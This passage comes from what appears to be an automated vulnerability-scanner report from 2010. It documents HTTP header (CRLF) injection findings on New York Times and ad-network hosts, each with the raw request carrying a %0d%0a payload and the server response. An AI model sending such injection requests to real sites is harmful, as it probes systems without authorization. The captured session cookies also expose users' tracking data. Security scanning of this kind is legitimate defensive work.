GET /psc/TAM/EMPLOYEE/HRMS/122a5%0d%0af997558f359/HRS_HRAM.HRS_CE.GBL HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: careers.nytco.com Connection: Keep-Alive Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 13 Nov 2010 02:06:01 GMT Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/122a5 f997558f359/HRS_HRAM.HRS_CE.GBL?& Content-Type: text/html Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJFm1qTLtKy2GrV8L5Ldmky3htJyGD!-9483320; path=/ Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=6zUc1Hr+hS8fzguR93ZUHsyJw2D+pTonngW4GKmuJP1Uu6XCofTPdoPRiY6t6ilNZb3U41AiOXsvgiZZ4b7ONkeraFa7TgACwmKFYbx6fq6Xn6F1I/aTFXpFXDJSkH7qUlFP9FTkvXZKz6nzhK0SmMV8P2IqxLgs; path=/ Content-Length: 379
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://careers.nytco.com/psc/TAM/ ...[SNIP]...
2.14. https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 6]
Summary
Severity: High
Confidence: Certain
Host: https://careers.nytco.com
Path: /psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL
Issue detail
The value of REST URL parameter 6 is copied into the Location response header. The payload bda3d%0d%0a16b48f1ff0c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /psc/TAM/EMPLOYEE/HRMS/c/bda3d%0d%0a16b48f1ff0c HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */* Referer: https://careers.nytco.com/TAM/nyt_docs/TAM/candidate.html Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: careers.nytco.com Connection: Keep-Alive Cookie: __utma=236704414.2109174387.1289612695.1289612695.1289612695.1; __utmb=236704414; __utmz=236704414.1289612695.1.1.utmccn=(referral)|utmcsr=nytimes.com|utmcct=/timeswire/index.html|utmcmd=referral; __utmc=236704414
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 13 Nov 2010 02:06:01 GMT Location: https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/bda3d 16b48f1ff0c?& Content-Type: text/html Set-Cookie: nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=MdyJR4BQYkGJqp5ZL2X8GZGbXcMSf98p!-9483320; path=/ Set-Cookie: NCES_nyhq-hpw-hrrp2-80-PORTAL-PSJSESSIONID=7t0h06Q/IRWLHue1c9MOGG3EKVj3snl0QIoYoY3JzcLvmvO9K8XlUvIN6Y8k7AxfIBUNxUC3514n2pcAQA2hW+2E3lO6ayKzaN3t3KdXF+99ca85Af21gWJmvWwcZWSQIk43wSRWOFf+SzvaJVxjU/d5Uq6c9VPt; path=/ Content-Length: 343
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://careers.nytco.com/psc/TAM/ ...[SNIP]...
2.15. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://movies2.nytimes.com
Path: /gst/movies/movie.html
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7a35a%0d%0a19b04d91325 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7a35a%0d%0a19b04d91325/movies/movie.html?v_id=451514 HTTP/1.1 Host: movies2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:07:15 GMT Content-length: 0 Content-type: text/html Location: http://movies.nytimes.com/pages/movies/index.html/7a35a 19b04d91325/movies/movie.html?v_id=451514
2.16. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://movies2.nytimes.com
Path: /gst/movies/movie.html
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 5a82d%0d%0adf25b0b4f75 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /gst/5a82d%0d%0adf25b0b4f75/movie.html?v_id=451514 HTTP/1.1 Host: movies2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:08:05 GMT Content-length: 0 Content-type: text/html Location: http://movies.nytimes.com/pages/movies/index.html/gst/5a82d df25b0b4f75/movie.html?v_id=451514
2.17. http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://movies2.nytimes.com
Path: /gst/movies/movie.html
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload e822f%0d%0a652f2e24a5a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /gst/movies/e822f%0d%0a652f2e24a5a?v_id=451514 HTTP/1.1 Host: movies2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:08:10 GMT Content-length: 0 Content-type: text/html Location: http://movies.nytimes.com/pages/movies/index.html/gst/movies/e822f 652f2e24a5a?v_id=451514
2.18. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter]
Summary
Severity: High
Confidence: Certain
Host: http://na.link.decdna.net
Path: /n/78471/87266/ad.vulnerable.ad.partner/dfwcxw
Issue detail
The value of the 11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq request parameter is copied into the location response header. The payload 52713%0d%0a256b90df09e was submitted in the 11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter. This caused a response containing an injected HTTP header.
Request
GET /n/78471/87266/ad.vulnerable.ad.partner/dfwcxw;11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq=52713%0d%0a256b90df09e&247cr=4059381386 HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 02:06:42 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Sat, 13 Nov 2010 02:06:42 GMT location: http://ad.vulnerable.ad.partner52713 256b90df09e Set-Cookie: %2edecdna%2enet/%2fn%2f78471/2/e=1289614002/78471/87266/1/0//8///764076663/0/0/96966748///0/1289614002/ct%2c/0/http%3a%2f%2fad%2edoubleclick%2enet52713%0d%0a256b90df09e/22888697/4059381386; expires=Mon, 13-Dec-2010 02:06:42 GMT; path=/n/78471; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9286422803672728651; expires=Sun, 13-Nov-2011 02:06:42 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9286422803672729261; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
2.19. http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://na.link.decdna.net
Path: /n/78471/87266/ad.vulnerable.ad.partner/dfwcxw
Issue detail
The value of REST URL parameter 4 is copied into the location response header. The payload 493a9%0d%0a20f05077930 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /n/78471/87266/493a9%0d%0a20f05077930/dfwcxw;11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq=%2fclk%3b222387429%3b46056971%3bq%3fhttp%3a%2f%2fr%2eclickforensics%2ecom%2f2464%2fC029ED6A4E%2fwww%2ehelppreventhepatitis%2ecom%2fhelp%2dprotect%2dyourself%2fhepatitis%2dprotection%2ehtml%3frotation%3d46056971%26banner%3d222387429%26src%3d1%26kw%3dp&247cr=4059381386 HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 02:06:45 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Sat, 13 Nov 2010 02:06:45 GMT location: http://493a9 20f05077930/clk;222387429;46056971;q?http://r.clickforensics.com/2464/C029ED6A4E/www.helppreventhepatitis.com/help-protect-yourself/hepatitis-protection.html?rotation=46056971&banner=222387429&src=1&kw=p Set-Cookie: %2edecdna%2enet/%2fn%2f78471/2/e=1289614005/78471/87266/1/0//8///764076663/0/0/96966748///0/1289614005/ct%2c/0/http%3a%2f%2f493a9%0d%0a20f05077930%2fclk%3b222387429%3b46056971%3bq%3fhttp%3a%2f%2fr%2eclickforensics%2ecom%2f2464%2fC029ED6A4E%2fwww%2ehelppreventhepatitis%2ecom%2fhelp%2dprotect%2dyourself%2fhepatitis%2dprotection%2ehtml%3frotation%3d46056971%26banner%3d222387429%26src%3d1%26kw%3dp/22888697/4059381386; expires=Mon, 13-Dec-2010 02:06:45 GMT; path=/n/78471; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9286422803941163528; expires=Sun, 13-Nov-2011 02:06:45 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9286422803941163819; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
2.20. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://nytimes.com
Path: /ref/membercenter/help/infoservdirectory.html
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload f7dbb%0d%0aef896eaeb9a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /f7dbb%0d%0aef896eaeb9a/membercenter/help/infoservdirectory.html HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:07:13 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/f7dbb ef896eaeb9a/membercenter/help/infoservdirectory.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.21. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://nytimes.com
Path: /ref/membercenter/help/infoservdirectory.html
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload c6f96%0d%0a63068f27cab was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /ref/c6f96%0d%0a63068f27cab/help/infoservdirectory.html HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:08:00 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/ref/c6f96 63068f27cab/help/infoservdirectory.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.22. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://nytimes.com
Path: /ref/membercenter/help/infoservdirectory.html
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload d8dfd%0d%0a52675aa17e1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /ref/membercenter/d8dfd%0d%0a52675aa17e1/infoservdirectory.html HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:08:00 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/ref/membercenter/d8dfd 52675aa17e1/infoservdirectory.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.23. http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://nytimes.com
Path: /ref/membercenter/help/infoservdirectory.html
Issue detail
The value of REST URL parameter 4 is copied into the Location response header. The payload ba656%0d%0ac1c6899a20 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /ref/membercenter/help/ba656%0d%0ac1c6899a20 HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:07:59 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/ref/membercenter/help/ba656 c1c6899a20 Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.24. http://nytimes.com/rss [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://nytimes.com
Path: /rss
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7df2a%0d%0a5589811a206 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7df2a%0d%0a5589811a206 HTTP/1.1 Host: nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289610004728:ss=1289608767320; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD3ABC3AB810AB0730A00703; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD3ABC3AB810AB0730A00703; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:07:11 GMT Content-length: 122 Content-type: text/html Location: http://www.nytimes.com/7df2a 5589811a206 Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.25. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://pixel2519.everesttech.net
Path: /2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click
Issue detail
The value of REST URL parameter 3 is copied into the Set-Cookie response header. The payload 56e58%0d%0ad99abd59502 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /2519/rq/56e58%0d%0ad99abd59502/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click HTTP/1.1 Host: pixel2519.everesttech.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 02:36:36 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k Set-Cookie: everest_session_v2=7KpM3fm0AwAAKus; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~7KpM3fm0AwAAKus; path=/; domain=.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache, max-age=0 Set-Cookie: everest_cookie=ev_surferid~7KpM3fm0AwAAKus~ev_uid~2519~ev_sid~56e58 d99abd59502~ev_clientid~c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229~ev_clickid~7KpM3fm0AwAAKus~ev_clicktime~20101113023636; path=/; domain=pixel2519.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT Location: http://clickserve.dartsearch.net/link/click?ev_userid=2519&ev_sid=56e58 d99abd59502&ev_clientid=c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229&url=http:/clickserve.dartsearch.net/link/click&ef_id=7KpM3fm0AwAAKus:20101113023636:s Expires: Sat, 13 Nov 2010 02:36:36 GMT Content-Length: 547 Keep-Alive: timeout=15, max=584 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://clickserve.dartsearch.net/link/click?ev_ ...[SNIP]...
2.26. http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://pixel2519.everesttech.net
Path: /2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click
Issue detail
The value of REST URL parameter 4 is copied into the Set-Cookie response header. The payload b5412%0d%0acbbc9e6376e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /2519/rq/3/b5412%0d%0acbbc9e6376e/url=http:/clickserve.dartsearch.net/link/click HTTP/1.1 Host: pixel2519.everesttech.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 02:36:36 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k Set-Cookie: everest_session_v2=s5ZM3fm0AQAAAaI; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~s5ZM3fm0AQAAAaI; path=/; domain=.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache, max-age=0 Set-Cookie: everest_cookie=ev_surferid~s5ZM3fm0AQAAAaI~ev_uid~2519~ev_sid~3~ev_clientid~b5412 cbbc9e6376e~ev_clickid~s5ZM3fm0AQAAAaI~ev_clicktime~20101113023636; path=/; domain=pixel2519.everesttech.net; expires=Sat, 17-Nov-2029 13:16:36 GMT Location: http://clickserve.dartsearch.net/link/click?ev_userid=2519&ev_sid=3&ev_clientid=b5412 cbbc9e6376e&url=http:/clickserve.dartsearch.net/link/click&ef_id=s5ZM3fm0AQAAAaI:20101113023636:s Expires: Sat, 13 Nov 2010 02:36:36 GMT Content-Length: 503 Keep-Alive: timeout=15, max=553 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://clickserve.dartsearch.net/link/click?ev_ ...[SNIP]...
2.27. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://theater2.nytimes.com
Path: /gst/theater/tabclist.html
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 89d8a%0d%0af550ad8fb26 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /89d8a%0d%0af550ad8fb26/theater/tabclist.html HTTP/1.1 Host: theater2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:38:59 GMT Content-length: 0 Content-type: text/html Location: http://theater.nytimes.com/89d8a f550ad8fb26/theater/tabclist.html
2.28. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://theater2.nytimes.com
Path: /gst/theater/tabclist.html
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 99ac1%0d%0aaf9b8979722 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /gst/99ac1%0d%0aaf9b8979722/tabclist.html HTTP/1.1 Host: theater2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:38:59 GMT Content-length: 0 Content-type: text/html Location: http://theater.nytimes.com/gst/99ac1 af9b8979722/tabclist.html
2.29. http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://theater2.nytimes.com
Path: /gst/theater/tabclist.html
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload dbbee%0d%0adec65f30f2e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /gst/theater/dbbee%0d%0adec65f30f2e HTTP/1.1 Host: theater2.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:38:59 GMT Content-length: 0 Content-type: text/html Location: http://theater.nytimes.com/gst/theater/dbbee dec65f30f2e
2.30. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/business/companies/facebook_inc/
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload aa7f7%0d%0ac83acbda829 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /top/aa7f7%0d%0ac83acbda829/business/companies/facebook_inc/ HTTP/1.1 Host: topics.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;
Response
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Sat, 13 Nov 2010 02:57:01 GMT Content-length: 122 Content-type: text/html Location: http://topics.nytimes.com/top/aa7f7 c83acbda829/business/companies/facebook_inc/index.html Connection: close
<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD> <BODY><H1>Moved Permanently</H1> An error has occurred. </BODY></HTML>
2.31. http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://topics.nytimes.com
Path: /top/news/business/companies/facebook_inc/
Issue detail
The value of REST URL parameter 3 is copied into the Location response header. The payload 2bbb8%0d%0aba85651de7d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
